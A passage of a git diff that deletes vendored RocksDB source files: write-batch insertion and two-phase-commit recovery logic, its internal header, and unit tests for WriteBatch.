-    if (flush_scheduler_ != nullptr) {
-      auto* cfd = cf_mems_->current();
-      assert(cfd != nullptr);
-      if (cfd->mem()->ShouldScheduleFlush() &&
-          cfd->mem()->MarkFlushScheduled()) {
-        // MarkFlushScheduled only returns true if we are the one that
-        // should take action, so no need to dedup further
-        flush_scheduler_->ScheduleFlush(cfd);
-      }
-    }
-  }
-
-  Status MarkBeginPrepare() override {
-    assert(rebuilding_trx_ == nullptr);
-    assert(db_);
-
-    if (recovering_log_number_ != 0) {
-      // during recovery we rebuild a hollow transaction
-      // from all encountered prepare sections of the wal
-      if (db_->allow_2pc() == false) {
-        return Status::NotSupported(
-            "WAL contains prepared transactions. Open with "
-            "TransactionDB::Open().");
-      }
-
-      // we are now iterating through a prepared section
-      rebuilding_trx_ = new WriteBatch();
-      if (has_valid_writes_ != nullptr) {
-        *has_valid_writes_ = true;
-      }
-    } else {
-      // in non-recovery we ignore prepare markers
-      // and insert the values directly. making sure we have a
-      // log for each insertion to reference.
-      assert(log_number_ref_ > 0);
-    }
-
-    return Status::OK();
-  }
-
-  Status MarkEndPrepare(const Slice& name) override {
-    assert(db_);
-    assert((rebuilding_trx_ != nullptr) == (recovering_log_number_ != 0));
-
-    if (recovering_log_number_ != 0) {
-      assert(db_->allow_2pc());
-      db_->InsertRecoveredTransaction(recovering_log_number_, name.ToString(),
-                                      rebuilding_trx_);
-      rebuilding_trx_ = nullptr;
-    } else {
-      assert(rebuilding_trx_ == nullptr);
-      assert(log_number_ref_ > 0);
-    }
-
-    return Status::OK();
-  }
-
-  Status MarkCommit(const Slice& name) override {
-    assert(db_);
-
-    Status s;
-
-    if (recovering_log_number_ != 0) {
-      // in recovery when we encounter a commit marker
-      // we lookup this transaction in our set of rebuilt transactions
-      // and commit.
-      auto trx = db_->GetRecoveredTransaction(name.ToString());
-
-      // the log contaiting the prepared section may have
-      // been released in the last incarnation because the
-      // data was flushed to L0
-      if (trx != nullptr) {
-        // at this point individual CF lognumbers will prevent
-        // duplicate re-insertion of values.
-        assert(log_number_ref_ == 0);
-        // all insertes must reference this trx log number
-        log_number_ref_ = trx->log_number_;
-        s = trx->batch_->Iterate(this);
-        log_number_ref_ = 0;
-
-        if (s.ok()) {
-          db_->DeleteRecoveredTransaction(name.ToString());
-        }
-        if (has_valid_writes_ != nullptr) {
-          *has_valid_writes_ = true;
-        }
-      }
-    } else {
-      // in non recovery we simply ignore this tag
-    }
-
-    return s;
-  }
-
-  Status MarkRollback(const Slice& name) override {
-    assert(db_);
-
-    if (recovering_log_number_ != 0) {
-      auto trx = db_->GetRecoveredTransaction(name.ToString());
-
-      // the log containing the transactions prep section
-      // may have been released in the previous incarnation
-      // because we knew it had been rolled back
-      if (trx != nullptr) {
-        db_->DeleteRecoveredTransaction(name.ToString());
-      }
-    } else {
-      // in non recovery we simply ignore this tag
-    }
-
-    return Status::OK();
-  }
-
- private:
-  MemTablePostProcessInfo* get_post_process_info(MemTable* mem) {
-    if (!concurrent_memtable_writes_) {
-      // No need to batch counters locally if we don't use concurrent mode.
-      return nullptr;
-    }
-    return &GetPostMap()[mem];
-  }
-};
-
-// This function can only be called in these conditions:
-// 1) During Recovery()
-// 2) During Write(), in a single-threaded write thread
-// 3) During Write(), in a concurrent context where memtables has been cloned
-// The reason is that it calls memtables->Seek(), which has a stateful cache
-Status WriteBatchInternal::InsertInto(WriteThread::WriteGroup& write_group,
-                                      SequenceNumber sequence,
-                                      ColumnFamilyMemTables* memtables,
-                                      FlushScheduler* flush_scheduler,
-                                      bool ignore_missing_column_families,
-                                      uint64_t recovery_log_number, DB* db,
-                                      bool concurrent_memtable_writes) {
-  MemTableInserter inserter(sequence, memtables, flush_scheduler,
-                            ignore_missing_column_families, recovery_log_number,
-                            db, concurrent_memtable_writes);
-  for (auto w : write_group) {
-    if (!w->ShouldWriteToMemtable()) {
-      continue;
-    }
-    SetSequence(w->batch, inserter.sequence());
-    w->sequence = inserter.sequence();
-    inserter.set_log_number_ref(w->log_ref);
-    w->status = w->batch->Iterate(&inserter);
-    if (!w->status.ok()) {
-      return w->status;
-    }
-  }
-  return Status::OK();
-}
-
-Status WriteBatchInternal::InsertInto(WriteThread::Writer* writer,
-                                      SequenceNumber sequence,
-                                      ColumnFamilyMemTables* memtables,
-                                      FlushScheduler* flush_scheduler,
-                                      bool ignore_missing_column_families,
-                                      uint64_t log_number, DB* db,
-                                      bool concurrent_memtable_writes) {
-  assert(writer->ShouldWriteToMemtable());
-  MemTableInserter inserter(sequence, memtables, flush_scheduler,
-                            ignore_missing_column_families, log_number, db,
-                            concurrent_memtable_writes);
-  SetSequence(writer->batch, sequence);
-  inserter.set_log_number_ref(writer->log_ref);
-  Status s = writer->batch->Iterate(&inserter);
-  if (concurrent_memtable_writes) {
-    inserter.PostProcess();
-  }
-  return s;
-}
-
-Status WriteBatchInternal::InsertInto(
-    const WriteBatch* batch, ColumnFamilyMemTables* memtables,
-    FlushScheduler* flush_scheduler, bool ignore_missing_column_families,
-    uint64_t log_number, DB* db, bool concurrent_memtable_writes,
-    SequenceNumber* last_seq_used, bool* has_valid_writes) {
-  MemTableInserter inserter(Sequence(batch), memtables, flush_scheduler,
-                            ignore_missing_column_families, log_number, db,
-                            concurrent_memtable_writes, has_valid_writes);
-  Status s = batch->Iterate(&inserter);
-  if (last_seq_used != nullptr) {
-    *last_seq_used = inserter.sequence();
-  }
-  if (concurrent_memtable_writes) {
-    inserter.PostProcess();
-  }
-  return s;
-}
-
-Status WriteBatchInternal::SetContents(WriteBatch* b, const Slice& contents) {
-  assert(contents.size() >= WriteBatchInternal::kHeader);
-  b->rep_.assign(contents.data(), contents.size());
-  b->content_flags_.store(ContentFlags::DEFERRED, std::memory_order_relaxed);
-  return Status::OK();
-}
-
-Status WriteBatchInternal::Append(WriteBatch* dst, const WriteBatch* src,
-                                  const bool wal_only) {
-  size_t src_len;
-  int src_count;
-  uint32_t src_flags;
-
-  const SavePoint& batch_end = src->GetWalTerminationPoint();
-
-  if (wal_only && !batch_end.is_cleared()) {
-    src_len = batch_end.size - WriteBatchInternal::kHeader;
-    src_count = batch_end.count;
-    src_flags = batch_end.content_flags;
-  } else {
-    src_len = src->rep_.size() - WriteBatchInternal::kHeader;
-    src_count = Count(src);
-    src_flags = src->content_flags_.load(std::memory_order_relaxed);
-  }
-
-  SetCount(dst, Count(dst) + src_count);
-  assert(src->rep_.size() >= WriteBatchInternal::kHeader);
-  dst->rep_.append(src->rep_.data() + WriteBatchInternal::kHeader, src_len);
-  dst->content_flags_.store(
-      dst->content_flags_.load(std::memory_order_relaxed) | src_flags,
-      std::memory_order_relaxed);
-  return Status::OK();
-}
-
-size_t WriteBatchInternal::AppendedByteSize(size_t leftByteSize,
-                                            size_t rightByteSize) {
-  if (leftByteSize == 0 || rightByteSize == 0) {
-    return leftByteSize + rightByteSize;
-  } else {
-    return leftByteSize + rightByteSize - WriteBatchInternal::kHeader;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_batch_base.cc b/thirdparty/rocksdb/db/write_batch_base.cc
deleted file mode 100644
index 5522c1f..0000000
--- a/thirdparty/rocksdb/db/write_batch_base.cc
+++ /dev/null
@@ -1,94 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/write_batch_base.h"
-
-#include <string>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// Simple implementation of SlicePart variants of Put().  Child classes
-// can override these method with more performant solutions if they choose.
-Status WriteBatchBase::Put(ColumnFamilyHandle* column_family,
-                           const SliceParts& key, const SliceParts& value) {
-  std::string key_buf, value_buf;
-  Slice key_slice(key, &key_buf);
-  Slice value_slice(value, &value_buf);
-
-  return Put(column_family, key_slice, value_slice);
-}
-
-Status WriteBatchBase::Put(const SliceParts& key, const SliceParts& value) {
-  std::string key_buf, value_buf;
-  Slice key_slice(key, &key_buf);
-  Slice value_slice(value, &value_buf);
-
-  return Put(key_slice, value_slice);
-}
-
-Status WriteBatchBase::Delete(ColumnFamilyHandle* column_family,
-                              const SliceParts& key) {
-  std::string key_buf;
-  Slice key_slice(key, &key_buf);
-  return Delete(column_family, key_slice);
-}
-
-Status WriteBatchBase::Delete(const SliceParts& key) {
-  std::string key_buf;
-  Slice key_slice(key, &key_buf);
-  return Delete(key_slice);
-}
-
-Status WriteBatchBase::SingleDelete(ColumnFamilyHandle* column_family,
-                                    const SliceParts& key) {
-  std::string key_buf;
-  Slice key_slice(key, &key_buf);
-  return SingleDelete(column_family, key_slice);
-}
-
-Status WriteBatchBase::SingleDelete(const SliceParts& key) {
-  std::string key_buf;
-  Slice key_slice(key, &key_buf);
-  return SingleDelete(key_slice);
-}
-
-Status WriteBatchBase::DeleteRange(ColumnFamilyHandle* column_family,
-                                   const SliceParts& begin_key,
-                                   const SliceParts& end_key) {
-  std::string begin_key_buf, end_key_buf;
-  Slice begin_key_slice(begin_key, &begin_key_buf);
-  Slice end_key_slice(end_key, &end_key_buf);
-  return DeleteRange(column_family, begin_key_slice, end_key_slice);
-}
-
-Status WriteBatchBase::DeleteRange(const SliceParts& begin_key,
-                                   const SliceParts& end_key) {
-  std::string begin_key_buf, end_key_buf;
-  Slice begin_key_slice(begin_key, &begin_key_buf);
-  Slice end_key_slice(end_key, &end_key_buf);
-  return DeleteRange(begin_key_slice, end_key_slice);
-}
-
-Status WriteBatchBase::Merge(ColumnFamilyHandle* column_family,
-                             const SliceParts& key, const SliceParts& value) {
-  std::string key_buf, value_buf;
-  Slice key_slice(key, &key_buf);
-  Slice value_slice(value, &value_buf);
-
-  return Merge(column_family, key_slice, value_slice);
-}
-
-Status WriteBatchBase::Merge(const SliceParts& key, const SliceParts& value) {
-  std::string key_buf, value_buf;
-  Slice key_slice(key, &key_buf);
-  Slice value_slice(value, &value_buf);
-
-  return Merge(key_slice, value_slice);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_batch_internal.h b/thirdparty/rocksdb/db/write_batch_internal.h
deleted file mode 100644
index 2408686..0000000
--- a/thirdparty/rocksdb/db/write_batch_internal.h
+++ /dev/null
@@ -1,230 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <vector>
-#include "db/write_thread.h"
-#include "rocksdb/types.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class MemTable;
-class FlushScheduler;
-class ColumnFamilyData;
-
-class ColumnFamilyMemTables {
- public:
-  virtual ~ColumnFamilyMemTables() {}
-  virtual bool Seek(uint32_t column_family_id) = 0;
-  // returns true if the update to memtable should be ignored
-  // (useful when recovering from log whose updates have already
-  // been processed)
-  virtual uint64_t GetLogNumber() const = 0;
-  virtual MemTable* GetMemTable() const = 0;
-  virtual ColumnFamilyHandle* GetColumnFamilyHandle() = 0;
-  virtual ColumnFamilyData* current() { return nullptr; }
-};
-
-class ColumnFamilyMemTablesDefault : public ColumnFamilyMemTables {
- public:
-  explicit ColumnFamilyMemTablesDefault(MemTable* mem)
-      : ok_(false), mem_(mem) {}
-
-  bool Seek(uint32_t column_family_id) override {
-    ok_ = (column_family_id == 0);
-    return ok_;
-  }
-
-  uint64_t GetLogNumber() const override { return 0; }
-
-  MemTable* GetMemTable() const override {
-    assert(ok_);
-    return mem_;
-  }
-
-  ColumnFamilyHandle* GetColumnFamilyHandle() override { return nullptr; }
-
- private:
-  bool ok_;
-  MemTable* mem_;
-};
-
-// WriteBatchInternal provides static methods for manipulating a
-// WriteBatch that we don't want in the public WriteBatch interface.
-class WriteBatchInternal {
- public:
-
-  // WriteBatch header has an 8-byte sequence number followed by a 4-byte count.
-  static const size_t kHeader = 12;
-
-  // WriteBatch methods with column_family_id instead of ColumnFamilyHandle*
-  static Status Put(WriteBatch* batch, uint32_t column_family_id,
-                    const Slice& key, const Slice& value);
-
-  static Status Put(WriteBatch* batch, uint32_t column_family_id,
-                    const SliceParts& key, const SliceParts& value);
-
-  static Status Delete(WriteBatch* batch, uint32_t column_family_id,
-                       const SliceParts& key);
-
-  static Status Delete(WriteBatch* batch, uint32_t column_family_id,
-                       const Slice& key);
-
-  static Status SingleDelete(WriteBatch* batch, uint32_t column_family_id,
-                             const SliceParts& key);
-
-  static Status SingleDelete(WriteBatch* batch, uint32_t column_family_id,
-                             const Slice& key);
-
-  static Status DeleteRange(WriteBatch* b, uint32_t column_family_id,
-                            const Slice& begin_key, const Slice& end_key);
-
-  static Status DeleteRange(WriteBatch* b, uint32_t column_family_id,
-                            const SliceParts& begin_key,
-                            const SliceParts& end_key);
-
-  static Status Merge(WriteBatch* batch, uint32_t column_family_id,
-                      const Slice& key, const Slice& value);
-
-  static Status Merge(WriteBatch* batch, uint32_t column_family_id,
-                      const SliceParts& key, const SliceParts& value);
-
-  static Status PutBlobIndex(WriteBatch* batch, uint32_t column_family_id,
-                             const Slice& key, const Slice& value);
-
-  static Status MarkEndPrepare(WriteBatch* batch, const Slice& xid);
-
-  static Status MarkRollback(WriteBatch* batch, const Slice& xid);
-
-  static Status MarkCommit(WriteBatch* batch, const Slice& xid);
-
-  static Status InsertNoop(WriteBatch* batch);
-
-  // Return the number of entries in the batch.
-  static int Count(const WriteBatch* batch);
-
-  // Set the count for the number of entries in the batch.
-  static void SetCount(WriteBatch* batch, int n);
-
-  // Return the seqeunce number for the start of this batch.
-  static SequenceNumber Sequence(const WriteBatch* batch);
-
-  // Store the specified number as the seqeunce number for the start of
-  // this batch.
-  static void SetSequence(WriteBatch* batch, SequenceNumber seq);
-
-  // Returns the offset of the first entry in the batch.
-  // This offset is only valid if the batch is not empty.
-  static size_t GetFirstOffset(WriteBatch* batch);
-
-  static Slice Contents(const WriteBatch* batch) {
-    return Slice(batch->rep_);
-  }
-
-  static size_t ByteSize(const WriteBatch* batch) {
-    return batch->rep_.size();
-  }
-
-  static Status SetContents(WriteBatch* batch, const Slice& contents);
-
-  // Inserts batches[i] into memtable, for i in 0..num_batches-1 inclusive.
-  //
-  // If ignore_missing_column_families == true. WriteBatch
-  // referencing non-existing column family will be ignored.
-  // If ignore_missing_column_families == false, processing of the
-  // batches will be stopped if a reference is found to a non-existing
-  // column family and InvalidArgument() will be returned.  The writes
-  // in batches may be only partially applied at that point.
-  //
-  // If log_number is non-zero, the memtable will be updated only if
-  // memtables->GetLogNumber() >= log_number.
-  //
-  // If flush_scheduler is non-null, it will be invoked if the memtable
-  // should be flushed.
-  //
-  // Under concurrent use, the caller is responsible for making sure that
-  // the memtables object itself is thread-local.
-  static Status InsertInto(WriteThread::WriteGroup& write_group,
-                           SequenceNumber sequence,
-                           ColumnFamilyMemTables* memtables,
-                           FlushScheduler* flush_scheduler,
-                           bool ignore_missing_column_families = false,
-                           uint64_t log_number = 0, DB* db = nullptr,
-                           bool concurrent_memtable_writes = false);
-
-  // Convenience form of InsertInto when you have only one batch
-  // last_seq_used returns the last sequnce number used in a MemTable insert
-  static Status InsertInto(const WriteBatch* batch,
-                           ColumnFamilyMemTables* memtables,
-                           FlushScheduler* flush_scheduler,
-                           bool ignore_missing_column_families = false,
-                           uint64_t log_number = 0, DB* db = nullptr,
-                           bool concurrent_memtable_writes = false,
-                           SequenceNumber* last_seq_used = nullptr,
-                           bool* has_valid_writes = nullptr);
-
-  static Status InsertInto(WriteThread::Writer* writer, SequenceNumber sequence,
-                           ColumnFamilyMemTables* memtables,
-                           FlushScheduler* flush_scheduler,
-                           bool ignore_missing_column_families = false,
-                           uint64_t log_number = 0, DB* db = nullptr,
-                           bool concurrent_memtable_writes = false);
-
-  static Status Append(WriteBatch* dst, const WriteBatch* src,
-                       const bool WAL_only = false);
-
-  // Returns the byte size of appending a WriteBatch with ByteSize
-  // leftByteSize and a WriteBatch with ByteSize rightByteSize
-  static size_t AppendedByteSize(size_t leftByteSize, size_t rightByteSize);
-};
-
-// LocalSavePoint is similar to a scope guard
-class LocalSavePoint {
- public:
-  explicit LocalSavePoint(WriteBatch* batch)
-      : batch_(batch),
-        savepoint_(batch->GetDataSize(), batch->Count(),
-                   batch->content_flags_.load(std::memory_order_relaxed))
-#ifndef NDEBUG
-        ,
-        committed_(false)
-#endif
-  {
-  }
-
-#ifndef NDEBUG
-  ~LocalSavePoint() { assert(committed_); }
-#endif
-  Status commit() {
-#ifndef NDEBUG
-    committed_ = true;
-#endif
-    if (batch_->max_bytes_ && batch_->rep_.size() > batch_->max_bytes_) {
-      batch_->rep_.resize(savepoint_.size);
-      WriteBatchInternal::SetCount(batch_, savepoint_.count);
-      batch_->content_flags_.store(savepoint_.content_flags,
-                                   std::memory_order_relaxed);
-      return Status::MemoryLimit();
-    }
-    return Status::OK();
-  }
-
- private:
-  WriteBatch* batch_;
-  SavePoint savepoint_;
-#ifndef NDEBUG
-  bool committed_;
-#endif
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_batch_test.cc b/thirdparty/rocksdb/db/write_batch_test.cc
deleted file mode 100644
index 4584793..0000000
--- a/thirdparty/rocksdb/db/write_batch_test.cc
+++ /dev/null
@@ -1,894 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/db.h"
-
-#include <memory>
-#include "db/column_family.h"
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-static std::string PrintContents(WriteBatch* b) {
-  InternalKeyComparator cmp(BytewiseComparator());
-  auto factory = std::make_shared<SkipListFactory>();
-  Options options;
-  options.memtable_factory = factory;
-  ImmutableCFOptions ioptions(options);
-  WriteBufferManager wb(options.db_write_buffer_size);
-  MemTable* mem = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb,
-                               kMaxSequenceNumber, 0 /* column_family_id */);
-  mem->Ref();
-  std::string state;
-  ColumnFamilyMemTablesDefault cf_mems_default(mem);
-  Status s = WriteBatchInternal::InsertInto(b, &cf_mems_default, nullptr);
-  int count = 0;
-  int put_count = 0;
-  int delete_count = 0;
-  int single_delete_count = 0;
-  int delete_range_count = 0;
-  int merge_count = 0;
-  for (int i = 0; i < 2; ++i) {
-    Arena arena;
-    ScopedArenaIterator arena_iter_guard;
-    std::unique_ptr<InternalIterator> iter_guard;
-    InternalIterator* iter;
-    if (i == 0) {
-      iter = mem->NewIterator(ReadOptions(), &arena);
-      arena_iter_guard.set(iter);
-    } else {
-      iter = mem->NewRangeTombstoneIterator(ReadOptions());
-      iter_guard.reset(iter);
-    }
-    if (iter == nullptr) {
-      continue;
-    }
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ParsedInternalKey ikey;
-      ikey.clear();
-      EXPECT_TRUE(ParseInternalKey(iter->key(), &ikey));
-      switch (ikey.type) {
-        case kTypeValue:
-          state.append("Put(");
-          state.append(ikey.user_key.ToString());
-          state.append(", ");
-          state.append(iter->value().ToString());
-          state.append(")");
-          count++;
-          put_count++;
-          break;
-        case kTypeDeletion:
-          state.append("Delete(");
-          state.append(ikey.user_key.ToString());
-          state.append(")");
-          count++;
-          delete_count++;
-          break;
-        case kTypeSingleDeletion:
-          state.append("SingleDelete(");
-          state.append(ikey.user_key.ToString());
-          state.append(")");
-          count++;
-          single_delete_count++;
-          break;
-        case kTypeRangeDeletion:
-          state.append("DeleteRange(");
-          state.append(ikey.user_key.ToString());
-          state.append(", ");
-          state.append(iter->value().ToString());
-          state.append(")");
-          count++;
-          delete_range_count++;
-          break;
-        case kTypeMerge:
-          state.append("Merge(");
-          state.append(ikey.user_key.ToString());
-          state.append(", ");
-          state.append(iter->value().ToString());
-          state.append(")");
-          count++;
-          merge_count++;
-          break;
-        default:
-          assert(false);
-          break;
-      }
-      state.append("@");
-      state.append(NumberToString(ikey.sequence));
-    }
-  }
-  EXPECT_EQ(b->HasPut(), put_count > 0);
-  EXPECT_EQ(b->HasDelete(), delete_count > 0);
-  EXPECT_EQ(b->HasSingleDelete(), single_delete_count > 0);
-  EXPECT_EQ(b->HasDeleteRange(), delete_range_count > 0);
-  EXPECT_EQ(b->HasMerge(), merge_count > 0);
-  if (!s.ok()) {
-    state.append(s.ToString());
-  } else if (count != WriteBatchInternal::Count(b)) {
-    state.append("CountMismatch()");
-  }
-  delete mem->Unref();
-  return state;
-}
-
-class WriteBatchTest : public testing::Test {};
-
-TEST_F(WriteBatchTest, Empty) {
-  WriteBatch batch;
-  ASSERT_EQ("", PrintContents(&batch));
-  ASSERT_EQ(0, WriteBatchInternal::Count(&batch));
-  ASSERT_EQ(0, batch.Count());
-}
-
-TEST_F(WriteBatchTest, Multiple) {
-  WriteBatch batch;
-  batch.Put(Slice("foo"), Slice("bar"));
-  batch.Delete(Slice("box"));
-  batch.DeleteRange(Slice("bar"), Slice("foo"));
-  batch.Put(Slice("baz"), Slice("boo"));
-  WriteBatchInternal::SetSequence(&batch, 100);
-  ASSERT_EQ(100U, WriteBatchInternal::Sequence(&batch));
-  ASSERT_EQ(4, WriteBatchInternal::Count(&batch));
-  ASSERT_EQ(
-      "Put(baz, boo)@103"
-      "Delete(box)@101"
-      "Put(foo, bar)@100"
-      "DeleteRange(bar, foo)@102",
-      PrintContents(&batch));
-  ASSERT_EQ(4, batch.Count());
-}
-
-TEST_F(WriteBatchTest, Corruption) {
-  WriteBatch batch;
-  batch.Put(Slice("foo"), Slice("bar"));
-  batch.Delete(Slice("box"));
-  WriteBatchInternal::SetSequence(&batch, 200);
-  Slice contents = WriteBatchInternal::Contents(&batch);
-  WriteBatchInternal::SetContents(&batch,
-                                  Slice(contents.data(),contents.size()-1));
-  ASSERT_EQ("Put(foo, bar)@200"
-            "Corruption: bad WriteBatch Delete",
-            PrintContents(&batch));
-}
-
-TEST_F(WriteBatchTest, Append) {
-  WriteBatch b1, b2;
-  WriteBatchInternal::SetSequence(&b1, 200);
-  WriteBatchInternal::SetSequence(&b2, 300);
-  WriteBatchInternal::Append(&b1, &b2);
-  ASSERT_EQ("",
-            PrintContents(&b1));
-  ASSERT_EQ(0, b1.Count());
-  b2.Put("a", "va");
-  WriteBatchInternal::Append(&b1, &b2);
-  ASSERT_EQ("Put(a, va)@200",
-            PrintContents(&b1));
-  ASSERT_EQ(1, b1.Count());
-  b2.Clear();
-  b2.Put("b", "vb");
-  WriteBatchInternal::Append(&b1, &b2);
-  ASSERT_EQ("Put(a, va)@200"
-            "Put(b, vb)@201",
-            PrintContents(&b1));
-  ASSERT_EQ(2, b1.Count());
-  b2.Delete("foo");
-  WriteBatchInternal::Append(&b1, &b2);
-  ASSERT_EQ("Put(a, va)@200"
-            "Put(b, vb)@202"
-            "Put(b, vb)@201"
-            "Delete(foo)@203",
-            PrintContents(&b1));
-  ASSERT_EQ(4, b1.Count());
-  b2.Clear();
-  b2.Put("c", "cc");
-  b2.Put("d", "dd");
-  b2.MarkWalTerminationPoint();
-  b2.Put("e", "ee");
-  WriteBatchInternal::Append(&b1, &b2, /*wal only*/ true);
-  ASSERT_EQ(
-      "Put(a, va)@200"
-      "Put(b, vb)@202"
-      "Put(b, vb)@201"
-      "Put(c, cc)@204"
-      "Put(d, dd)@205"
-      "Delete(foo)@203",
-      PrintContents(&b1));
-  ASSERT_EQ(6, b1.Count());
-  ASSERT_EQ(
-      "Put(c, cc)@0"
-      "Put(d, dd)@1"
-      "Put(e, ee)@2",
-      PrintContents(&b2));
-  ASSERT_EQ(3, b2.Count());
-}
-
-TEST_F(WriteBatchTest, SingleDeletion) {
-  WriteBatch batch;
-  WriteBatchInternal::SetSequence(&batch, 100);
-  ASSERT_EQ("", PrintContents(&batch));
-  ASSERT_EQ(0, batch.Count());
-  batch.Put("a", "va");
-  ASSERT_EQ("Put(a, va)@100", PrintContents(&batch));
-  ASSERT_EQ(1, batch.Count());
-  batch.SingleDelete("a");
-  ASSERT_EQ(
-      "SingleDelete(a)@101"
-      "Put(a, va)@100",
-      PrintContents(&batch));
-  ASSERT_EQ(2, batch.Count());
-}
-
-namespace {
-  struct TestHandler : public WriteBatch::Handler {
-    std::string seen;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      if (column_family_id == 0) {
-        seen += "Put(" + key.ToString() + ", " + value.ToString() + ")";
-      } else {
-        seen += "PutCF(" + ToString(column_family_id) + ", " +
-                key.ToString() + ", " + value.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      if (column_family_id == 0) {
-        seen += "Delete(" + key.ToString() + ")";
-      } else {
-        seen += "DeleteCF(" + ToString(column_family_id) + ", " +
-                key.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                  const Slice& key) override {
-      if (column_family_id == 0) {
-        seen += "SingleDelete(" + key.ToString() + ")";
-      } else {
-        seen += "SingleDeleteCF(" + ToString(column_family_id) + ", " +
-                key.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual Status DeleteRangeCF(uint32_t column_family_id,
-                                 const Slice& begin_key,
-                                 const Slice& end_key) override {
-      if (column_family_id == 0) {
-        seen += "DeleteRange(" + begin_key.ToString() + ", " +
-                end_key.ToString() + ")";
-      } else {
-        seen += "DeleteRangeCF(" + ToString(column_family_id) + ", " +
-                begin_key.ToString() + ", " + end_key.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      if (column_family_id == 0) {
-        seen += "Merge(" + key.ToString() + ", " + value.ToString() + ")";
-      } else {
-        seen += "MergeCF(" + ToString(column_family_id) + ", " +
-                key.ToString() + ", " + value.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override {
-      seen += "LogData(" + blob.ToString() + ")";
-    }
-    virtual Status MarkBeginPrepare() override {
-      seen += "MarkBeginPrepare()";
-      return Status::OK();
-    }
-    virtual Status MarkEndPrepare(const Slice& xid) override {
-      seen += "MarkEndPrepare(" + xid.ToString() + ")";
-      return Status::OK();
-    }
-    virtual Status MarkCommit(const Slice& xid) override {
-      seen += "MarkCommit(" + xid.ToString() + ")";
-      return Status::OK();
-    }
-    virtual Status MarkRollback(const Slice& xid) override {
-      seen += "MarkRollback(" + xid.ToString() + ")";
-      return Status::OK();
-    }
-  };
-}
-
-TEST_F(WriteBatchTest, PutNotImplemented) {
-  WriteBatch batch;
-  batch.Put(Slice("k1"), Slice("v1"));
-  ASSERT_EQ(1, batch.Count());
-  ASSERT_EQ("Put(k1, v1)@0", PrintContents(&batch));
-
-  WriteBatch::Handler handler;
-  ASSERT_OK(batch.Iterate(&handler));
-}
-
-TEST_F(WriteBatchTest, DeleteNotImplemented) {
-  WriteBatch batch;
-  batch.Delete(Slice("k2"));
-  ASSERT_EQ(1, batch.Count());
-  ASSERT_EQ("Delete(k2)@0", PrintContents(&batch));
-
-  WriteBatch::Handler handler;
-  ASSERT_OK(batch.Iterate(&handler));
-}
-
-TEST_F(WriteBatchTest, SingleDeleteNotImplemented) {
-  WriteBatch batch;
-  batch.SingleDelete(Slice("k2"));
-  ASSERT_EQ(1, batch.Count());
-  ASSERT_EQ("SingleDelete(k2)@0", PrintContents(&batch));
-
-  WriteBatch::Handler handler;
-  ASSERT_OK(batch.Iterate(&handler));
-}
-
-TEST_F(WriteBatchTest, MergeNotImplemented) {
-  WriteBatch batch;
-  batch.Merge(Slice("foo"), Slice("bar"));
-  ASSERT_EQ(1, batch.Count());
-  ASSERT_EQ("Merge(foo, bar)@0", PrintContents(&batch));
-
-  WriteBatch::Handler handler;
-  ASSERT_OK(batch.Iterate(&handler));
-}
-
-TEST_F(WriteBatchTest, Blob) {
-  WriteBatch batch;
-  batch.Put(Slice("k1"), Slice("v1"));
-  batch.Put(Slice("k2"), Slice("v2"));
-  batch.Put(Slice("k3"), Slice("v3"));
-  batch.PutLogData(Slice("blob1"));
-  batch.Delete(Slice("k2"));
-  batch.SingleDelete(Slice("k3"));
-  batch.PutLogData(Slice("blob2"));
-  batch.Merge(Slice("foo"), Slice("bar"));
-  ASSERT_EQ(6, batch.Count());
-  ASSERT_EQ(
-      "Merge(foo, bar)@5"
-      "Put(k1, v1)@0"
-      "Delete(k2)@3"
-      "Put(k2, v2)@1"
-      "SingleDelete(k3)@4"
-      "Put(k3, v3)@2",
-      PrintContents(&batch));
-
-  TestHandler handler;
-  batch.Iterate(&handler);
-  ASSERT_EQ(
-      "Put(k1, v1)"
-      "Put(k2, v2)"
-      "Put(k3, v3)"
-      "LogData(blob1)"
-      "Delete(k2)"
-      "SingleDelete(k3)"
-      "LogData(blob2)"
